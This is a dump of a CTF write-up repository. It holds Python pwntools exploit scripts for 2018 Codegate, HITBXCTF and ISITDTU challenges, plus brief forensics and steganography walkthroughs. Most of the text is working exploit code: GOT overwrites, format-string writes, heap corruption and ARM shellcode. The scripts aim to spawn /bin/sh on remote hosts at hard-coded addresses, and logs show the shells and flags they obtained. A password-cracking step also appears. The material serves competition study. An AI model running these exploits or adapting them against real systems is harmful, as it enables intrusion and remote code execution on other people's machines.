3333 61 | r = remote(HOST,PORT) 62 | 63 | strcmp_got = 0x603040 64 | puts_got = 0x603018 65 | exit_got = 0x603070 66 | malloc_got = 0x603050 67 | __libc_start_main_got = 0x603030 68 | r.recvuntil(">> ") 69 | Special("A"*0x10,"B"*0x20) 70 | Special("C"*0x10,"D"*0x20) 71 | Special("E"*0x10,"F"*0x20) 72 | Wait(0x48) 73 | payload = "A"*0x30 74 | payload += p64(strcmp_got) # time 75 | payload += p64(__libc_start_main_got) # name 76 | payload += p64(strcmp_got) # profile 77 | View(0, payload) 78 | res = View(1) 79 | print repr(res).replace("\\n","\n") 80 | __libc_start_main = u64(res.splitlines()[5][7:].ljust(8,"\x00")) 81 | log.info('__libc_start_main: %#x' % __libc_start_main) 82 | baselibc = __libc_start_main - offset__libc_start_main 83 | system = baselibc + offset_system 84 | log.info('baselibc: %#x' % baselibc) 85 | log.info('system: %#x' % 
system) 86 | payload = p64(system)[:-1] 87 | View(1, payload) 88 | raw_input("?") 89 | r.sendline("/bin/sh\x00") 90 | r.interactive() 91 | 92 | marimo(sys.argv[1]) 93 | # But_every_cat_is_more_cute_than_Marimo 94 | 95 | """ 96 | define ff 97 | echo ============== LIST:\n 98 | telescope 0x6030E0 15 99 | echo ============== COUNT:\n 100 | telescope 0x6030C0 1 101 | echo ============== MONEY:\n 102 | telescope 0x603158 1 103 | echo ============================\n 104 | end 105 | 106 | define fa 107 | x/40gx *0x6030E0-0x10 108 | end 109 | """ -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/melong/melong: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Codegate CTF 2018 Preliminary/melong/melong -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/melong/melong.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def melong(DEBUG="1"): 4 | def Checkbmi(height, weight): 5 | r.sendline("1") 6 | r.recvuntil("Your height(meters) : ") 7 | r.sendline(str(height)) 8 | r.recvuntil("Your weight(kilograms) : ") 9 | r.sendline(str(weight)) 10 | return r.recvuntil("Type the number:") 11 | 12 | def Exercise(): 13 | r.sendline("2") 14 | return r.recvuntil("Type the number:") 15 | 16 | def PT(howlong): 17 | r.sendline("3") 18 | r.recvuntil("How long do you want to take personal training?") 19 | r.sendline(str(howlong)) 20 | return r.recvuntil("Type the number:") 21 | 22 | def WriteDailyRecord(payload): 23 | r.sendline("4") 24 | r.send(payload) 25 | 26 | return r.recvuntil("Type the number:") 27 | 28 | 29 | if DEBUG=="1": 30 | r = process(["qemu-arm-static","-g","12345", "./melong"]) 31 | # target remote localhost:12345 32 | raw_input("Debug?") 33 | elif 
DEBUG=="2": 34 | r = process(["qemu-arm-static","./melong"]) 35 | raw_input("Debug?") 36 | elif DEBUG=="3": 37 | HOST = "ch41l3ng3s.codegate.kr" 38 | PORT = 1199 39 | r = remote(HOST,PORT) 40 | 41 | nop = "\x00\x00\xa0\xe1" 42 | main = 0x000110D4 43 | data = 0x23064 44 | shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00" 45 | r.recvuntil("Type the number:") 46 | Checkbmi(123, 123) 47 | Exercise() 48 | Checkbmi(123, 123) 49 | Exercise() 50 | PT(0) 51 | PT(80) 52 | PT(80) 53 | WriteDailyRecord("\xff"*0x50) 54 | res = WriteDailyRecord("\xff"*0x5C) 55 | stack = u32(res[10+0x5c:10+0x5c+4]) 56 | log.info('stack: %#x' % stack) 57 | payload = nop*10 58 | payload += shellcode 59 | payload += "\xff"*(0x50-len(payload)) 60 | payload += p32(stack) # fp 61 | payload += p32(stack-0x190) # pc 62 | WriteDailyRecord(payload) 63 | r.sendline("6") 64 | r.sendline("cat flag") 65 | r.interactive() 66 | 67 | melong(sys.argv[1]) 68 | 69 | """ 70 | $ python melong.py 3 71 | [+] Opening connection to ch41l3ng3s.codegate.kr on port 1199: Done 72 | [*] stack: 0xf6fffdf4 73 | [*] Switching to interactive mode 74 | See you again :) 75 | FLAG{D0n7_7h1nk_7ha7_1_Can_3xp1ain_it} 76 | $ 77 | """ -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/pix/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | $ zsteg ./aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate 3 | imagedata .. text: " !#865 " 4 | b1,r,msb,xy .. text: "y5b@2~2t" 5 | b1,rgb,lsb,xy .. file: Keepass password database 2.x KDBX 6 | b2,r,msb,xy .. text: "\rP`I$X7D" 7 | b2,bgr,lsb,xy .. text: "b;d'8H~M" 8 | b4,g,msb,xy .. 
text: ";pTr73& dvG:" 9 | ``` 10 | ``` 11 | $ zsteg -E b1,rgb,lsb,xy ./aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate > keepass.kdbx 12 | ``` 13 | ``` 14 | $ file keepass.kdbx 15 | keepass.kdbx: Keepass password database 2.x KDBX 16 | ``` 17 | ``` 18 | pix and password 19 | weak password! 20 | lower casee letters and number 21 | len(password) == 10 22 | hitb + number 23 | Crack Master password by john the ripper, I found Master Password is hitb180408 24 | ``` 25 | ``` 26 | Open keepass.kdbx with KeePass 27 | Group: flag, Title: flag, User Name: myname, Password: ********, URL: http://keepass.info/, Creation Time: 4/8/2018 3:49:14 PM, Last Modification Time: 4/8/2018 3:50:45 PM 28 | 29 | HITB{p1x_aNd_k33pass} 30 | ``` -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/pix/aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/pix/aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/pix/keepass.kdbx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/pix/keepass.kdbx -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | Fix IDAT chunk length + CRC: 3 | IDAT: 4 | Length: 1164470 5 | CRC: 6a0412ff 6 | ``` 7 | ``` 8 | $ zsteg ./e47c7307-b54c-4316-9894-5a8daec738b4.png 9 | extradata:imagedata .. 
file: zlib compressed data 10 | 00000000: 78 da 5d 50 89 6d 45 31 08 5b c9 dc 64 9c 04 5e |x.]P.mE1.[..d..^| 11 | 00000010: f6 1f a1 fc 43 aa 5a a4 28 60 c0 06 24 62 9f da |....C.Z.(`..$b..| 12 | 00000020: 97 83 0a 80 24 df e5 b5 48 f0 d7 e2 1f 20 85 87 |....$...H.... ..| 13 | 00000030: 55 b1 4a 79 dd 3e c8 2b f4 9c 62 71 3a 02 f2 0b |U.Jy.>.+..bq:...| 14 | 00000040: dd b1 36 02 29 10 d1 f2 ec d6 e8 23 29 8f 9e 60 |..6.)......#)..`| 15 | 00000050: f5 5d bb 33 d4 51 0d 9c ed 5c 77 3f 9e 86 a4 e4 |.].3.Q...\w?....| 16 | 00000060: ed cb 38 36 08 0a 1f 41 c2 7a 8f 10 38 e3 03 cc |..86...A.z..8...| 17 | 00000070: 83 5f 9a 98 b0 4d 10 75 62 df 33 0c 65 7b 64 9d |._...M.ub.3.e{d.| 18 | 00000080: 47 76 72 04 b3 7e 8f 4c df 57 5c 1c f3 27 86 bd |Gvr..~.L.W\..'..| 19 | 00000090: c4 ce 92 ef 72 06 22 1a 7e f8 28 fa dc c3 a7 de |....r.".~.(.....| 20 | 000000a0: e3 93 24 7e d5 bf bc 54 3d 57 6c 2e d6 c3 3f a7 |..$~...T=Wl...?.| 21 | 000000b0: fa e2 8f fb 7a d2 bd a9 47 99 f4 83 27 ee ad ee |....z...G...'...| 22 | 000000c0: e5 f2 c5 6d f6 79 e3 bf 46 13 88 1a 05 bb e8 35 |...m.y..F......5| 23 | 000000d0: f3 16 b7 70 0a e3 63 1e a6 6c 29 e9 c1 47 d7 b4 |...p..c..l)..G..| 24 | 000000e0: 87 b4 f4 0f c3 ab 68 44 |......hD | 25 | ``` 26 | ``` 27 | $ pigz -d -i ./tpyx.zz 28 | ``` 29 | ``` 30 | $ python -c 'data=open("tpyx","rb").read().decode("hex");open("tpyx2","wb").write(data)' 31 | ``` 32 | ``` 33 | $ cat tpyx2 | xxd 34 | 00000000: 377a bcaf 271c 0003 82f9 6c91 3000 0000 7z..'.....l.0... 35 | 00000010: 0000 0000 7300 0000 0000 0000 3c0e 2440 ....s.......<.$@ 36 | 00000020: 9c42 9fdb 08f3 1ebc 2361 b301 6f04 a79a .B......#a..o... 37 | 00000030: 0708 3033 4c68 dd47 db38 3e4b 7246 acad ..03Lh.G.8>KrF.. 38 | 00000040: 8746 0cd0 0ba6 2cfa e685 0818 2a69 527a .F....,.....*iRz 39 | 00000050: 0104 0600 0109 3000 070b 0100 0224 06f1 ......0......$.. 40 | 00000060: 0701 0a53 07cb 7afb faec 5aa0 7623 0301 ...S..z...Z.v#.. 
41 | 00000070: 0105 5d00 0001 0001 000c 2c27 0008 0a01 ..].......,'.... 42 | 00000080: c35b 9330 0000 0501 110b 0066 006c 0061 .[.0.......f.l.a 43 | 00000090: 0067 0000 0012 0a01 0000 844b f357 1cd1 .g.........K.W.. 44 | 000000a0: 0113 0a01 0000 e669 e866 d1d3 0114 0a01 .......i.f...... 45 | 000000b0: 0080 ffcd d963 d1d3 0115 0601 0080 0000 .....c.......... 46 | 000000c0: 0000 0018 0034 5172 634f 556d 3657 6175 .....4QrcOUm6Wau 47 | 000000d0: 2b56 7542 5838 672b 4950 673d 3d +VuBX8g+IPg== 48 | 49 | ``` 50 | ``` 51 | $ 7z x tpyx2 52 | 7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18 53 | p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU) 54 | 55 | Processing archive: tpyx2 56 | 57 | 58 | Enter password (will not be echoed) :4QrcOUm6Wau+VuBX8g+IPg== 59 | Extracting flag 60 | 61 | Everything is Ok 62 | 63 | Size: 39 64 | Compressed: 221 65 | ``` 66 | 67 | ``` 68 | $ cat flag 69 | HITB{0c88d56694c2fb3bcc416e122c1072eb} 70 | ``` -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/e47c7307-b54c-4316-9894-5a8daec738b4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/tpyx/e47c7307-b54c-4316-9894-5a8daec738b4.png -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/flag: -------------------------------------------------------------------------------- 1 | HITB{0c88d56694c2fb3bcc416e122c1072eb} 2 | -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/tpyx: -------------------------------------------------------------------------------- 1 | 
377abcaf271c000382f96c91300000000000000073000000000000003c0e24409c429fdb08f31ebc2361b3016f04a79a070830334c68dd47db383e4b7246acad87460cd00ba62cfae68508182a69527a0104060001093000070b0100022406f107010a5307cb7afbfaec5aa07623030101055d0000010001000c2c2700080a01c35b933000000501110b0066006c00610067000000120a010000844bf3571cd101130a010000e669e866d1d301140a010080ffcdd963d1d301150601008000000000001800345172634f556d365761752b5675425838672b4950673d3d -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/tpyx2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/tpyx/tpyx2 -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/tpyx2.zlib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/tpyx/tpyx2.zlib -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/babypwn/babypwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | import subprocess 5 | import sys 6 | import time 7 | 8 | HOST = "47.75.182.113" 9 | PORT = 9999 10 | 11 | context.arch = 'amd64' 12 | context.os = 'linux' 13 | context.endian = 'little' 14 | context.word_size = 32 15 | 16 | context.log_level = 'INFO' 17 | 18 | def leak(addr): 19 | payload = "%7$s.AAA"+p64(addr) 20 | r.sendline(payload) 21 | print "leaking:", hex(addr) 22 | resp = r.recvuntil(".AAA") 23 | ret = resp[:-4:] + "\x00" 24 | r.recvrepeat(0.2) 25 | return ret 26 | 27 | if __name__ == "__main__": 28 | r = remote(HOST, PORT) 29 | d = DynELF(leak, 0x40076d) 30 | dynamic_ptr = d.dynamic 31 | cnt = 0 32 | while True: 33 | 
addr = dynamic_ptr + 0x10*cnt 34 | ret = leak(addr) 35 | if ret == "\x03\x00": #TYPE PLTGOT 36 | addr += 8 37 | for i in xrange(8): 38 | ret = leak(addr+i) 39 | print "retX:", ret.encode('hex') 40 | break 41 | else: 42 | cnt += 1 43 | system_addr = d.lookup('system', 'libc') 44 | printf_addr = d.lookup('printf', 'libc') 45 | # [+] printf_addr: 0x7fb678d11800 46 | # [+] system_addr: 0x7fb678d01390 47 | log.success("printf_addr: "+hex(printf_addr)) 48 | log.success("system_addr: "+hex(system_addr)) 49 | 50 | offset_system = 0x10470 51 | # got = 0x601000 52 | # for i in xrange(0,0x10): 53 | # ret = leak(got+1+i*8) 54 | # print "ret2:", ret.encode('hex') 55 | 56 | printf_got = 0x601020 57 | printf_addr = u64(("\x00" + leak(printf_got+1)).ljust(8, "\x00")) 58 | system_addr = printf_addr - offset_system 59 | 60 | 61 | log.success("printf_addr: " + hex(printf_addr)) 62 | log.success("system_addr: " + hex(system_addr)) 63 | 64 | byte1 = system_addr & 0xff 65 | byte2 = (system_addr & 0xffff00) >> 8 66 | log.success("byte1: " + hex(byte1)) 67 | log.success("byte2: " + hex(byte2)) 68 | 69 | payload = "%" + str(byte1) + "u" + "%10$hhn." 70 | payload += "%" + str(byte2-byte1-1) + "u" + "%11$hn." 
71 | payload = payload.ljust(32, "A") 72 | payload += p64(printf_got) + p64(printf_got+1) 73 | r.sendline(payload) 74 | r.sendline("sh\x00") 75 | r.interactive() 76 | 77 | """ 78 | http://bruce30262.logdown.com/posts/1255979-33c3-ctf-2016-espr 79 | 0.AAAAA \x10`$ ls 80 | babypwn 81 | bin 82 | dev 83 | flag 84 | lib 85 | lib32 86 | lib64 87 | $ cat flag 88 | HITB{Baby_Pwn_BabY_bl1nd} 89 | $ 90 | """ -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/d/d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/pwn/d/d -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/d/d.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | from base64 import b64encode, b64decode 5 | 6 | def d(DEBUG): 7 | t = 0.5 8 | if DEBUG=="1": 9 | offset_libc_start_main = 0x20740 10 | offset_system = 0x45390 11 | offset_sh = 0x18cd57 12 | r = process("./d") 13 | raw_input("debug?") 14 | elif DEBUG=="2": 15 | offset_libc_start_main = 0x20740 16 | offset_system = 0x45390 17 | offset_sh = 0x18cd57 18 | t = 0.03 19 | HOST = '47.75.154.113' 20 | PORT = 9999 21 | r = remote(HOST,PORT) 22 | 23 | def Read(idx, msg): 24 | r.sendline("1") 25 | r.recvuntil("Which? :") 26 | r.sendline(str(idx)) 27 | r.recvuntil("msg:") 28 | if len(msg)==0x400: 29 | r.send(msg) 30 | time.sleep(t) 31 | else: 32 | r.sendline(msg) 33 | return r.recvuntil("Which? :") 34 | 35 | def Edit(idx, msg): 36 | r.sendline("2") 37 | r.recvuntil("Which? :") 38 | r.sendline(str(idx)) 39 | r.recvuntil("new msg:") 40 | if len(msg)==0x400: 41 | r.send(msg) 42 | time.sleep(t) 43 | else: 44 | r.sendline(msg) 45 | return r.recvuntil("Which? :") 46 | 47 | def Wipe(idx): 48 | r.sendline("3") 49 | r.recvuntil("Which? 
:") 50 | r.sendline(str(idx)) 51 | return r.recvuntil("Which? :") 52 | 53 | 54 | r.recvuntil("Which? :") 55 | addr = 0x60217d-0x10 56 | LIST_ADDR = 0x602180 57 | free_got = 0x602018 58 | printf_got = 0x602038 59 | strlen_got = 0x602028 60 | atoi_got = 0x602068 61 | atoi_plt = 0x400800 62 | libc_start_main_got = 0x602050 63 | puts_plt = 0x400770 64 | dl_resolve_got = 0x602010 65 | Read(0, b64encode("a"*0x20)) 66 | 67 | Read(1, b64encode("a"*0x20)) 68 | 69 | Read(2, b64encode("a"*0x60)) 70 | 71 | Read(3, b64encode("a"*0x60)) 72 | 73 | Wipe(0) 74 | 75 | Read(0, b64encode("\x60"*0x29)[:-1]) 76 | 77 | payload = "a"*0x28 78 | payload += p64(0x71) 79 | Edit(2, payload) 80 | Wipe(1) 81 | Wipe(2) 82 | 83 | Read(1, b64encode("a"*0x50)) 84 | 85 | payload = p64(0)*5 86 | payload += p64(0x71) 87 | payload += p64(addr) 88 | Edit(1, payload) 89 | 90 | Read(2, b64encode("a"*0x60)) 91 | 92 | payload = "a"*3 93 | payload += "A"*(0x50-len(payload)) 94 | 95 | Read(4, b64encode(payload)) 96 | 97 | payload = "0"*3 98 | payload += p64(LIST_ADDR) # 0 99 | payload += p64(free_got) # 1 100 | payload += p64(strlen_got) # 2 101 | payload += p64(atoi_got) # 3 102 | payload += p64(dl_resolve_got) # 4 103 | payload += p64(libc_start_main_got) # 5 104 | payload = payload.ljust(0x65,"\x00") 105 | Read(5, b64encode(payload)) 106 | 107 | payload = p64(puts_plt)[:5] 108 | Edit(1, payload) 109 | 110 | res = Wipe(5) 111 | libc_start_main = u64(res[:6].ljust(8,"\x00")) 112 | log.info("libc_start_main: %#x" % libc_start_main) 113 | baselibc = libc_start_main - offset_libc_start_main 114 | system = baselibc + offset_system 115 | sh = baselibc + offset_sh 116 | 117 | log.info("baselibc: %#x" % baselibc) 118 | log.info("system: %#x" % system) 119 | log.info("sh: %#x" % sh) 120 | 121 | payload = "/bin/sh\x00" 122 | Read(6, b64encode(payload)) 123 | 124 | Edit(4, p64(0x31313131)) # dl_resolve_got = "1111" 125 | 126 | payload = p64(atoi_plt) # strlen_got = atoi_plt 127 | Edit(2, payload) 128 | 129 | 
raw_input("?") 130 | msg = "A"*8 131 | msg += p64(system)[:-1] 132 | Edit(4, msg) 133 | 134 | r.sendline("3") # Wipe 135 | r.sendline("6") # idx sh 136 | # free(sh) => system(sh) 137 | r.interactive() 138 | 139 | d(sys.argv[1]) 140 | """ 141 | define ff 142 | telescope 0x602180 64 143 | x/40gx *0x602180-0x10 144 | fastbins 145 | end 146 | """ 147 | # HITB{b4se364_1s_th3_b3st_3nc0d1ng!} -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/once/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/pwn/once/libc-2.23.so -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/once/once: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/pwn/once/once -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/once/once.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def once(DEBUG): 6 | t = 0.5 7 | if DEBUG=="1": 8 | r = process("./once") 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | r = process("./once", env={"LD_PRELOAD":"./libc-2.23.so"}) 12 | raw_input("debug?") 13 | elif DEBUG=="3": 14 | t = 0.03 15 | HOST = '47.75.189.102' 16 | PORT = 9999 17 | r = remote(HOST,PORT) 18 | 19 | def getPuts(): 20 | r.sendline() 21 | r.recvuntil("Invalid choice\n") 22 | return r.recvuntil(">")[:-1] 23 | 24 | def initList(): 25 | r.sendline("1") 26 | return r.recvuntil("> ") 27 | 28 | def readItem(payload): 29 | r.sendline("2"+"\x00"*6) 30 | r.send(payload) 31 | time.sleep(t) 32 | return r.recvuntil("> ") 33 | 34 | def unlink(): 35 | r.sendline("3") 36 | 
return r.recvuntil("> ") 37 | 38 | def malloc(size): 39 | r.sendline("4") 40 | r.recvuntil("> ") 41 | r.sendline("1") 42 | r.recvuntil("input size:\n") 43 | r.sendline(str(size)) 44 | return r.recvuntil("> ") 45 | 46 | def readPtr(payload): 47 | r.sendline("4") 48 | r.recvuntil("> ") 49 | r.sendline("2"+"\x00"*6) 50 | r.sendline(payload) 51 | return r.recvuntil("> ") 52 | 53 | def freePtr(): 54 | r.sendline("4") 55 | r.recvuntil("> ") 56 | r.sendline("3") 57 | return r.recvuntil("> ") 58 | 59 | offset_puts = 0x6f690 60 | offset_main_arena = 0x3c4b20 61 | offset_system = 0x45390 62 | offset_stdout = 0x3c5620 63 | offset_stdin = 0x3c48e0 64 | 65 | PTR = 0x555555756068 66 | CHECKFREE = 0x555555756070 67 | 68 | r.recvuntil("> ") 69 | res = getPuts() 70 | puts = int(res, 16) 71 | baselibc = puts - offset_puts 72 | main_arena = baselibc + offset_main_arena 73 | top_chunk = main_arena + 0x58 74 | system = baselibc + offset_system 75 | stdout = baselibc + offset_stdout 76 | stdin = baselibc + offset_stdin 77 | free_hook = main_arena + 0x1c88 78 | log.info('baselibc: %#x' % baselibc) 79 | log.info('main_arena: %#x' % main_arena) 80 | log.info('top_chunk: %#x' % top_chunk) 81 | log.info('puts: %#x' % puts) 82 | log.info("system: %#x" % system) 83 | log.info("stdout: %#x" % stdout) 84 | log.info("stdin: %#x" % stdin) 85 | 86 | payload = p64(0) 87 | payload += p64(0x2001) 88 | payload += p64(0) 89 | payload += p64(top_chunk - 0x10) 90 | readItem(payload) 91 | initList() 92 | unlink() 93 | 94 | malloc(300) 95 | 96 | payload = "/bin/sh\x00" 97 | payload += p64(free_hook) 98 | payload += p64(stdout) 99 | payload += p64(0) 100 | payload += p64(stdin) 101 | payload += p64(0) 102 | payload += p64(0) 103 | readItem(payload) 104 | 105 | payload = p64(system) 106 | readPtr(payload) 107 | 108 | r.sendline("4") 109 | r.recvuntil("> ") 110 | r.sendline("3") 111 | r.interactive() 112 | 113 | once(sys.argv[1]) 114 | """ 115 | $ python once.py 3 116 | [+] Opening connection to 47.75.189.102 
on port 9999: Done 117 | [*] baselibc: 0x7f8778d74000 118 | [*] main_arena: 0x7f8779138b20 119 | [*] top_chunk: 0x7f8779138b78 120 | [*] puts: 0x7f8778de3690 121 | [*] system: 0x7f8778db9390 122 | [*] stdout: 0x7f8779139620 123 | [*] stdin: 0x7f87791388e0 124 | [*] Switching to interactive mode 125 | $ cat flag 126 | HITB{this_is_the_xxxxxxx_flag} 127 | $ 128 | """ -------------------------------------------------------------------------------- /2018/ISITDTU CTF 2018 Quals/babyformat/babyformat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/ISITDTU CTF 2018 Quals/babyformat/babyformat -------------------------------------------------------------------------------- /2018/ISITDTU CTF 2018 Quals/babyformat/babyformat.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def babyformat(DEBUG): 5 | if DEBUG=="1": 6 | # https://libc.blukat.me/?q=system%3A0x3ada0&l=libc6_2.23-0ubuntu10_i386 7 | offset___libc_start_main_ret = 0x18637 8 | offset_system = 0x3ada0 9 | offset_str_bin_sh = 0x15ba0b 10 | 11 | r = process('./babyformat') 12 | raw_input("debug?") 13 | elif DEBUG=="2": 14 | # https://libc.blukat.me/?q=__libc_start_main_ret%3Ae81&l=libc6-i386_2.27-3ubuntu1_amd64 15 | offset___libc_start_main_ret = 0x18e81 16 | offset_system = 0x0003cd10 17 | offset_str_bin_sh = 0x17b8cf 18 | 19 | HOST = '104.196.99.62' 20 | PORT = 2222 21 | r = remote(HOST,PORT) 22 | 23 | # make fmt more 24 | r.recvuntil("==== Baby Format - Echo system ====\n") 25 | payload = '%6$p%9$p%7$p' 26 | assert len(payload) <= 13 27 | r.send(payload) 28 | 29 | ebp = eval(r.recv(10)) 30 | addr = eval(r.recv(10)) 31 | back_addr = eval(r.recv(10))-0xe 32 | leak = ebp-0x1c 33 | offset = (addr-leak)/4+7 34 | 35 | log.info("ebp: %#x" %ebp) 36 | log.info("addr: %#x" %addr) 37 | log.info("back_addr: %#x" 
%back_addr) 38 | log.info("leak: %#x" %leak) 39 | log.info("offset: %#x" %offset) 40 | payload = "%"+str(leak&0xffff)+"c%9$hn" 41 | payload = payload.ljust(13, '\x00') 42 | assert len(payload) <= 13 43 | r.send(payload) 44 | r.recv(leak&0xffff) 45 | 46 | payload = "%"+str(back_addr&0xffff)+"c"+"%"+str(offset)+"$hn" 47 | payload = payload.ljust(13, '\x00') 48 | assert len(payload) <= 13 49 | r.send(payload) 50 | r.recv(back_addr&0xffff) 51 | 52 | payload = "%"+str((leak+0x13)&0xffff)+"c%10$hn" 53 | payload = payload.ljust(13, '\x00') 54 | assert len(payload) <= 13 55 | r.send(payload) 56 | r.recv((leak+0x13)&0xffff) 57 | 58 | payload = "%"+str(0xff)+"c"+"%"+str(offset+2)+"$hhn" 59 | payload = payload.ljust(13, '\x00') 60 | assert len(payload) <= 13 61 | r.send(payload) 62 | r.recv(0xff) 63 | 64 | # leak libc and control eip 65 | payload = '-->%15$p%13$p' 66 | payload = payload.ljust(13, '\x00') 67 | assert len(payload) <= 13 68 | r.send(payload) 69 | r.recvuntil('-->') 70 | _libc_start_main_ret = eval(r.recv(10)) 71 | log.info("_libc_start_main_ret: %#x" % _libc_start_main_ret) 72 | 73 | libc = _libc_start_main_ret - offset___libc_start_main_ret 74 | log.info("libc: %#x" %libc) 75 | system = libc + offset_system 76 | sh = libc + offset_str_bin_sh 77 | log.info("system: %#x" %system) 78 | log.info("sh: %#x" %sh) 79 | 80 | retaddr = eval(r.recv(10)) - 4 81 | log.info("retaddr %#x" %retaddr) 82 | 83 | # write system 84 | payload = "%"+str(retaddr&0xffff)+"c%9$hn" 85 | payload = payload.ljust(13, '\x00') 86 | assert len(payload) <= 13 87 | r.send(payload) 88 | r.recv(retaddr&0xffff) 89 | 90 | payload = "%"+str((retaddr+2)&0xffff)+"c%10$hn" 91 | payload = payload.ljust(13, '\x00') 92 | assert len(payload) <= 13 93 | r.send(payload) 94 | r.recv(retaddr&0xffff) 95 | 96 | payload = "%"+str(system&0xffff)+"c"+"%"+str(offset)+"$hn" 97 | payload = payload.ljust(13, '\x00') 98 | assert len(payload) <= 13 99 | r.send(payload) 100 | r.recv(system&0xffff) 101 | 102 | payload = 
"%"+str((system>>16)&0xffff)+"c"+"%"+str(offset+2)+"$hn" 103 | payload = payload.ljust(13, '\x00') 104 | assert len(payload) <= 13 105 | r.send(payload) 106 | r.recv((system>>16)&0xffff) 107 | 108 | 109 | #write sh 110 | payload = "%"+str((retaddr+8)&0xffff)+"c%9$hn" 111 | payload = payload.ljust(13, '\x00') 112 | assert len(payload) <= 13 113 | r.send(payload) 114 | r.recv(retaddr&0xffff) 115 | 116 | payload = "%"+str((retaddr+10)&0xffff)+"c%10$hn" 117 | payload = payload.ljust(13, '\x00') 118 | assert len(payload) <= 13 119 | r.send(payload) 120 | r.recv(retaddr&0xffff) 121 | 122 | payload = "%"+str(sh&0xffff)+"c"+"%"+str(offset)+"$hn" 123 | payload = payload.ljust(13, '\x00') 124 | assert len(payload) <= 13 125 | r.send(payload) 126 | r.recv(sh&0xffff) 127 | 128 | payload = "%"+str((sh>>16)&0xffff)+"c"+"%"+str(offset+2)+"$hn" 129 | payload = payload.ljust(13, '\x00') 130 | assert len(payload) <= 13 131 | r.send(payload) 132 | r.recv((sh>>16)&0xffff) 133 | 134 | payload = 'EXIT'.ljust(13, '\x00') 135 | r.send(payload) 136 | r.recvuntil('EXIT') 137 | r.interactive() 138 | 139 | babyformat(sys.argv[1]) -------------------------------------------------------------------------------- /2018/ISITDTU CTF 2018 Quals/encode/encode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from subprocess import Popen, PIPE 4 | import os 5 | 6 | def encode(): 7 | os.chdir("/var/www/html/") 8 | payload = 'A'*0x32+"\x70\x20\x02" 9 | filename = "encoded/file1.jpg"+payload 10 | """ 11 | # http://docs.pwntools.com/en/stable/shellcraft/arm.html 12 | from pwn import * 13 | context.arch = 'thumb' 14 | filename = "./flag" 15 | shellcode = asm(shellcraft.arm.to_thumb()) 16 | shellcode += asm(shellcraft.read(0, 'sp', 32)) 17 | shellcode += asm(shellcraft.arm.linux.cat(filename)) 18 | shellcode = shellcode.encode("hex") 19 | print shellcode 20 | """ 21 | 22 | shellcode = "01308fe213ff2fe1" # shellcraft.arm.to_thumb() 23 | 
